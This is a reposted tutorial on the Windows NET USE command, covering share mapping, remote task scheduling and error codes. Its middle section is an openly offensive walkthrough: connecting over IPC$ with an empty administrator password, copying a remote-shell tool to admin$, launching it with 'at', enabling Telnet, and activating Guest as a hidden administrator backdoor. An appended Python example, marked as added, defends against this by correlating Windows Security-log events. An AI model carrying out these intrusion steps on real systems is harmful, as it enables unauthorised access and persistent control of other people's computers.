NET USE command detailed

Source: Internet
Author: User

Disclaimer: This article is reproduced content; thanks to the original author for the hard work. The original link is: http://www.cnblogs.com/chinahbzm/articles/1423875.html

1) Establish an empty connection:
net use \\IP\ipc$ "" /user:"" (be sure to note that this command line contains 3 spaces)

2) Establish a non-empty connection:
net use \\IP\ipc$ "password" /user:"username" (the same 3 spaces)

3) Map the default share:
net use Z: \\IP\c$ "password" /user:"username" (this maps the other side's C drive to your own Z drive; other drives work the same way)
If an ipc$ connection to the target has already been established, the share can be accessed directly as IP + drive letter + $; the command is net use Z: \\IP\c$

4) Delete an ipc$ connection
net use \\IP\ipc$ /del

5) Delete shared mappings
net use C: /del  Deletes the mapped C drive; other drives work the same way
net use * /del  Deletes all mappings; a prompt asks you to press Y to confirm

3 View the shared resources of a remote host (the default shares are not shown)
net view \\IP

4 View the local host's shared resources (the local default shares are shown)
net share

5 Get the list of user names of a remote host
nbtstat -A IP

6 Get the list of users of the local host
net user

7 View the current time of a remote host
net time \\IP

8 Show the services currently running on the local host
net start

9 Start/stop local services
net start servicename /y
net stop servicename /y

10 Map a remote share:
net use Z: \\IP\baby
This command maps the shared resource named baby to the Z drive

11 Delete shared mappings
net use C: /del  Deletes the mapped C drive; other drives work the same way
net use * /del /y  Deletes all mappings

12 Copy files to a remote host
copy \path\srv.exe \\IP\sharename, for example:
copy ccbirds.exe \\*.*.*.*\c  Copies the file in the current directory to the other side's C drive

13 Add scheduled tasks remotely
at \\IP time program, for example:
at \\127.0.0.0 11:00am Love.exe
Note: the time uses the 24-hour format; a program in the default search path (such as system32/) needs no path, otherwise you must give the full path

14 Turn on Telnet for the remote host
This requires a small program, Opentelnet.exe, which every major download site has, and four requirements must also be met:

1) The target has ipc$ sharing open
2) You need to have the administrator account and password
3) The target has the RemoteRegistry service running, for the user's NTLM authentication
4) Valid for WIN2K/XP; NT is untested
Command format: OpenTelnet.exe \\server account psw NTLM-authentication-mode port
Example: C:\>opentelnet.exe \\*.*.*.* administrator "" 1 90

15 Activate a user/add it to the Administrators group
1 net user account /active:yes
2 net localgroup Administrators account /add

16 Turn off Telnet for the remote host
This also needs a small program: ResumeTelnet.exe
Command format: ResumeTelnet.exe \\server account psw
Example: C:\>resumetelnet.exe \\*.*.*.* Administrator ""

17 Delete an established ipc$ connection
net use \\IP\ipc$ /del

Nine classic intrusion patterns
This intrusion pattern is a classic; most IPC tutorials cover it, and I am citing it here too, with thanks to the original author! (I don't know which predecessor it was.)

1. C:\>net use \\127.0.0.1\IPC$ "" /user:"administrators"
This is an IP address that "Streamer" scanned and found to have the user name administrators and an "empty" password (an empty password? Wow, good luck). If you intend to attack, you can use this command to establish a connection with 127.0.0.1. Because the password is "empty", nothing is entered between the first pair of quotation marks; the second pair holds the user name, administrators. The command completes successfully.
Before copying, be sure to use the net view \\IP command to look at the other side's shares.

2. C:\>copy Srv.exe \\127.0.0.1\admin$
First copy Srv.exe over; it is in Streamer's Tools directory (here admin$ refers to the target's c:\winnt\system32\; we can also use c$ or d$, meaning the C and D drives, depending on where you want to copy to).

3. C:\>net time \\127.0.0.1
Check the time. It shows that the current time on 127.0.0.1 is 2002/3/19 11:00; the command completed successfully.

4. C:\>at \\127.0.0.1 11:05 Srv.exe
Use the at command to start Srv.exe (the time set here must be later than the host's time, otherwise how would it start, hehe!)

5. C:\>net time \\127.0.0.1
Check the time again. If the current time on 127.0.0.1 is 2002/3/19 11:05, get ready for the following command.

6. C:\>telnet 127.0.0.1 99
This uses the telnet command; note that the port is 99. Telnet defaults to port 23, but we used SRV to create a shell on port 99 on the other computer.
Although we can telnet in, SRV is one-time only and has to be activated again for the next login! So we are going to set up a Telnet service! This uses NTLM.

7. C:\>copy Ntlm.exe \\127.0.0.1\admin$
Use the copy command to upload Ntlm.exe to the host (Ntlm.exe is also in Streamer's Tools directory).

8. C:\WINNT\SYSTEM32>NTLM
Enter NTLM to start it (here C:\WINNT\SYSTEM32> is the other computer's prompt; running NTLM actually runs the program on the other computer). When "Done" appears, it has started normally. Then use "net start telnet" to turn on the Telnet service!

9. Telnet 127.0.0.1, then enter the user name and password to get into the other side; operating it is as simple as working in DOS! (Then what do you want to do? Do what you want to do, haha)

Just in case, we activate Guest and add it to the Administrators group.
Ten. C:\>net user guest /active:yes
Activates the other party's Guest user

C:\>net user guest 1234
Changes the Guest password to 1234, or to whatever password you want to set

C:\>net localgroup Administrators guest /add
Makes Guest an administrator ^_^ (if the administrator password changes but the Guest account does not, we can use Guest to access this computer again next time)
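
For defenders, the steps above leave a recognisable sequence in the target's Security log: access to an administrative share, a scheduled task created shortly afterwards, then account changes. The following added example (not part of the original article) correlates that sequence over constructed sample records. The record layout, host names and 30-minute window are assumptions, and the event IDs assume a current Windows version with file-share, object-access and account-management auditing enabled.

```python
from datetime import datetime, timedelta

ADMIN_SHARES = ("IPC$", "ADMIN$", "C$", "D$")
FMT = "%Y-%m-%d %H:%M:%S"

# Constructed sample records, not real logs. The IDs are Windows Security
# log event IDs: 5140 share accessed, 4698 scheduled task created,
# 4722 account enabled, 4732 member added to a local group.
SAMPLE = [
    {"host": "WS01", "time": "2024-01-15 11:00:05", "id": 5140, "src": "192.0.2.10", "share": r"\\*\IPC$"},
    {"host": "WS01", "time": "2024-01-15 11:01:10", "id": 5140, "src": "192.0.2.10", "share": r"\\*\ADMIN$"},
    {"host": "WS01", "time": "2024-01-15 11:02:00", "id": 4698, "task": r"\At1"},
    {"host": "WS01", "time": "2024-01-15 11:09:30", "id": 4722, "target": "Guest"},
    {"host": "WS01", "time": "2024-01-15 11:10:02", "id": 4732, "target": "Guest", "group": "Administrators"},
    {"host": "WS02", "time": "2024-01-15 11:03:00", "id": 5140, "src": "192.0.2.44", "share": r"\\*\public"},
    {"host": "WS02", "time": "2024-01-15 11:04:00", "id": 4698, "task": r"\Backup"},
    {"host": "WS03", "time": "2024-01-15 09:00:00", "id": 5140, "src": "192.0.2.10", "share": r"\\*\C$"},
    {"host": "WS03", "time": "2024-01-15 15:00:00", "id": 4698, "task": r"\Defrag"},
]

def stage(ev):
    """Map an event to the walkthrough step that would produce it, or None."""
    if ev["id"] == 5140 and ev.get("share", "").upper().endswith(ADMIN_SHARES):
        return "share"
    if ev["id"] == 4698:
        return "task"
    if ev["id"] == 4722 or (ev["id"] == 4732 and ev.get("group") == "Administrators"):
        return "account"
    return None

def find_chains(events, window=timedelta(minutes=30)):
    """Flag hosts where admin-share access is followed by task creation within window."""
    last_share, findings = {}, {}
    for ev in sorted(events, key=lambda e: e["time"]):
        when, host, kind = datetime.strptime(ev["time"], FMT), ev["host"], stage(ev)
        if kind == "share":
            last_share[host] = (when, ev["src"])
        elif kind == "task" and host in last_share and when - last_share[host][0] <= window:
            findings[host] = {"host": host, "src": last_share[host][1], "task": ev["task"],
                              "start": when, "severity": "medium", "accounts": []}
        elif kind == "account" and host in findings and when - findings[host]["start"] <= window:
            findings[host]["severity"] = "high"  # account change follows the remote task
            if ev["target"] not in findings[host]["accounts"]:
                findings[host]["accounts"].append(ev["target"])
    return list(findings.values())

if __name__ == "__main__":
    for f in find_chains(SAMPLE):
        print(f["host"], f["src"], f["task"], f["severity"], f["accounts"])
```

Only WS01 is flagged: WS02 touches an ordinary share, and on WS03 the task is created hours after the share access.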

Alternatively, you can analyze the cause based on the returned error number:

Error number 5, access denied: the user you are using probably does not have administrator rights; elevate the permissions first;
Error number 51, Windows cannot find the network path: network problem;
Error number 53, network path not found: the IP address is wrong, the target is not powered on, the target's LanmanServer service is not started, or the target has a firewall (port filtering);
Error number 67, the network name cannot be found: your LanmanWorkstation service is not started, or the target has deleted ipc$;
Error number 1219, the supplied credentials conflict with an existing set of credentials: you have already established an ipc$ connection with the target; delete it and connect again;
Error number 1326, unknown user name or bad password: the reason is obvious;
Error number 1792, an attempt was made to log on, but the network logon service was not started: the target's Netlogon service is not started;
Error number 2242, the user's password has expired: the target has an account policy that forces periodic password changes

To disconnect network mappings with this method, you only need to open the system's Run dialog box, run "cmd" to switch to the MS-DOS command line, and then run "net use X: /del" at the DOS prompt. This disconnects the network drive mapped to "X". To quickly disconnect all network mappings on the local computer, simply run "net use * /del".
